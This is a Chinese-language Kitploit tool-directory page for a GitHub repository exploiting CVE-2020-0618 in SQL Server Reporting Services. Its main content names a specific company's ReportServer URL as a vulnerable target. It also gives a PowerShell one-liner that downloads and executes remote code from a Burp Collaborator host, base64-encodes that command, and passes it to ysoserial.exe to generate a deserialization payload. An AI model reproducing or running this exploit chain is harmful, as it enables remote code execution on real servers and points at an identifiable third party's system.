Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
工具/GitHubGitHub/itstarsec/cve-2020-0618
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用命令与控制
GitHubitstarsec/cve-2020-0618

CVE-2020-0618

Melissa

查看仓库
264年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2020-0618

Melissa https://status.melissa.com/ReportServer_CUSTOMERSQL/Pages/ReportViewer.aspx <- 存在漏洞的链接

$command = '(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr("https://qoigyuef2a4z1a7rsir6lvi3eukl8a.burpcollaborator.net/In")|iex'

$bytes = [System.Text.Encoding]::Unicode.GetBytes($command)

$encodedCommand = [Convert]::ToBase64String($bytes)

.\ysoserial.exe -g TypeConfuseDelegate -f LosFormatter -c "powershell.exe -encodedCommand $encodedCommand" -o base64 | clip

参考:

  • https://github.com//euphrat1ca//CVE-2020-0618
  • https://www.exploit-db.com/exploits/48816
  • https://github.com/pwntester/ysoserial.net/releases
下载工具